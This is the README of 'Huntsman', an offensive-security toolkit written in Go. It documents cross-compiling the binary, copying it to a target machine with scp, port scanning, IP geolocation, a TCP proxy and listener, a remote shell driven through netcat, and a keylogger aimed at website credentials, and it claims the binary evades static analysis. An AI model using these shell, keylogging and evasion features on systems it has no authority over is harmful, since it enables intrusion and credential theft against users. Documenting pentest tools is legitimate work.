Huntsman: A swiss army knife for offensive security


A swiss army knife for offensive security.



The inspiration of this tool are primarily the following two sources:

  1. Pursuing Advanced Exercutive Program in Cyber Security and Cyber Defense at the esteemed c3i institution of IIT Kanpur and Professor Sandeep Shukla, Rohit Negi and Anand Handa, who helped take baby steps in cyber security world.
  2. The excellent book Black Hat Go: Go Programming For Hackers and Pentesters by Tom Steele, Chris Patten and Dan Kottmann.

What sets huntsman apart?

  • Fast and concurrent
  • Single binary executable for almost every platform and architecture
  • Consumes very less RAM (about 10-15 MB) and CPU
  • Each step well documented and covered in video tutorial as well
  • The binary compiled it Golang is very hard to reverse engineer, hence it is safe from Static Analysis to a large extent.

Complete Guide


There multiple ways in which you can install huntsman on your machine or a target machine.

  1. Install it using golang compiler using go install or go build

    1. Install Golang
    2. git clone
    3. cd huntsman
    4. go install
  2. Download the binary from RELEASES and save it on on $PATH.

  3. Use the script.

    ./ --help 
    Install go program for multiple OS and multiple architectures
    Run --help for all options
    usage: [-h]
    		      [--os {all,popular,linux,darwin,windows,dragonfly,android,freebsd,netbsd,openbsd,plan9,solaris,aixjs}]
    		      [--arch {all,popular,amd64,386,arm,ppc64,arm64,ppc64le,mips,mipsle,mips64,mips64le,s390x}]
    		      [--source SOURCE] [--target TARGET]
    optional arguments:
      -h, --help            show this help message and exit
      --os {all,popular,linux,darwin,windows,dragonfly,android,freebsd,netbsd,openbsd,plan9,solaris,aixjs}
    			The target OS. Eg. all,linux,darwin,windows,etc
      --arch {all,popular,amd64,386,arm,ppc64,arm64,ppc64le,mips,mipsle,mips64,mips64le,s390x}
    			The target's architecture. Eg. all,amd64,386,etc
      --source SOURCE       The directory where source source is present
      --target TARGET       The target dir where the binary needs to be stored


    Eg. Compiling for popular OSes like Windows, Microsoft and Linux for 64-bit architecture can be done using ./ --target ./download --os popular --arch amd64

Transfer to a target

Once you’ve compiled huntsman for the target OS and arch, you can transfer it using scp or any tool of choice:
Eg, transfering linux binary to target machine:
scp ./download/linux_amd64 username@address:location


Some tools allow you to store the information on the database, like IP location tracing.
If you want the same, you have to set the configuration for the same in config.json at the root and provide the following information:

  "mongo_uri": "uri of the mongo atlas",
  "mongo_database":"database name",
  "mongo_collection":"collection name",
  "js_file_path":"path to js file for serving reverse shell"

Fast concurrent port scanning

huntsman portscan --help                                                                                    SIGINT(2) ↵  5295  10:30:46
Concurrently scan the provided range (by default 0 to 65535) to check if any port is open

  huntsman portscan [flags]

  -e, --end int32       last port number (default 65535)
  -h, --help            help for portscan
  -s, --start int32     starting port number (default 1)
      --target string   IP/URL address of the machine to be scanned
  -t, --threads int32   the number of goroutines to execute at a time (default 100)

huntsman portScan --target

Location details of IP or tcpdump

huntsman ipinfo --help                                                                                              ✔  5244  03:05:00
Fetch the location information of the IP

  huntsman ipinfo [flags]

  -c, --config string     The path to the configuration JSON file
  -h, --help              help for ipinfo
      --ip string         IP address of the target
  -p, --persist           Do you want to store the response to mongo? If yes, please provide value to --config flag
  -s, --read-stream       Do you want to read from tcpdump output contineously?
  -t, --tcp-dump string   source file of tcpdump

There are three ways you can lookup location details of IP.

  1. Lookup single IP or domain name. Eg. huntsman ipinfo --ip
  2. Parse tcpdump log. Eg. huntsman ipinfo --tcp-dump server.log
  3. See the location details of incoming traffic in real tim. huntsman ipinfo -s
    If you want to store it to db, you can provide details in config.json at root dir, then use huntsman ipinfo -s -p -c config.json
    Youtube link for the video demonstration

Run a TCP proxy

huntsman proxy -s <local-port> -t <target-address> -p <target-port>

Run a TCP listener

huntsman listen --port=<port>

Reverse shell

First you need to compile the binary for the target machine using the or anything of choice. Then preferably use scp to transfer the binary to the target machine (see Installation section) then execute it using ./<binary-name> reverseshell --port <port-number>. Now the listener is running to which you will be sending instructions to execute.

We will be using netcat as the client for sending the commands over the network.
nc <address-of-target> <port-number>
Youtube link for the video demonstration


A keylogger can log the keystrokes made by a user ,typically on a website. The logged keystrokes most of the times are crucial credentials of the users. Hackers use Credential Harvester (like keylogger) to steal your credentials. Huntsman is the tool that contains a keylogger as well.
Eg. huntsman keylogger -w localhost:8192 -l 8192

This video is the demonstration for using huntsman as a keylogger. Link to youtube video